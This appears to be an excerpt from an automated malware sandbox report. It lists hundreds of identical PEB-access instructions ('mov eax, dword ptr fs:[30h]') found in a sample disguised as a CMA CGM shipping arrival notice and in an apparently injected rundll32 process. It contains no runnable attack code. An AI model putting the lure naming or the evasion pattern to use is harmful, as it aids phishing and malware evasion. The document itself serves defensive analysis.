      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E611B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E611B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E618794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E620050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E620050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E687016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E686CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E683884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E683884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E643D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E683540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E627D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E624120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E634D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E634D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E634D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E68A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6B8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E631DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E631DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E631DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_049214FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04934015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04934015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04880050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04880050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04922073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04931074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
